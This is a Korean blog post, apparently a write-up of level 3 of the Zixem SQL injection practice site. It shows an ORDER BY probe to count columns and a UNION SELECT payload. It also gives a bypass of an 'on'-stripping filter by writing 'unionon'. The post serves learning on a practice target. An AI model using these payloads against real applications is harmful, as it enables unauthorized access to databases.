티스토리 뷰
포스팅에 앞서 내용이 틀릴 수도 있으며, 해당 부분 지적은 감사히 받겠습니다.
3단계 웹페이지이다.
item을 파라미터로 받는다.
바로 본론으로 가자.
쿼리: ?item=3'order by 5--+-
5일 때 오류가 나서 칼럼은 4개다.
union구문을 작성하자
쿼리: ?item=2'union select 1,2,3,4--+-
문제가 발생했다.
문법 오류인데 쿼리는 정상적으로 입력되었지만 uni select 1,2,3,4로 입력되고 있었다.
아마 on문자열 제거 필터링이 된 것 같다.
on을 추가로 입력하자.
쿼리: ?item=2'unionon select 1,2,3,4--+-
우회에 성공했다.
바로 함수를 넣자.
문제 해결!
시행착오
1. on이 필터링되었을 때 unioonn은 우회되지 않고 unionon이 정상적으로 작동했다.
'SQL injection > Zixem' 카테고리의 다른 글
| Zixem 6단계-blind sql (0) | 2022.03.03 |
|---|---|
| Zixem 5단계-brute force (0) | 2022.03.03 |
| Zixem 4단계-Normal (0) | 2022.02.28 |
| Zixem 2단계-easy (0) | 2022.02.28 |
| Zixem 1단계-super easy (0) | 2022.02.28 |
댓글
반응형
공지사항
최근에 올라온 글
최근에 달린 댓글
- Total
- Today
- Yesterday
링크
TAG
- webhacking.kr
- samron3
- 코딩테스트 준비
- spring
- 기술스택
- los 15
- 백준 피보나치
- 상속
- ys.k
- lord of sql
- 김영한 실전 자바 기본
- 상품을 구매한 회원 비율 구하기 파이썬
- 프로그래머스 상품을 구매한 회원 비율 구하기 파이썬
- 자바
- los 15단계
- 백준
- java
- Los
- zixem
- extends
- 김영한 실전 자바 기초
- 코딩테스트
- static
- 김영한 실전 자바 중급
- 프로그래머스
- 백준 피보나치 수열
- 스프링
- 프로그래머스 상품을 구매한 회원 비율 구하기
- samron
- 김영한
| 일 | 월 | 화 | 수 | 목 | 금 | 토 |
|---|---|---|---|---|---|---|
| 1 | ||||||
| 2 | 3 | 4 | 5 | 6 | 7 | 8 |
| 9 | 10 | 11 | 12 | 13 | 14 | 15 |
| 16 | 17 | 18 | 19 | 20 | 21 | 22 |
| 23 | 24 | 25 | 26 | 27 | 28 | 29 |
| 30 |
글 보관함
250x250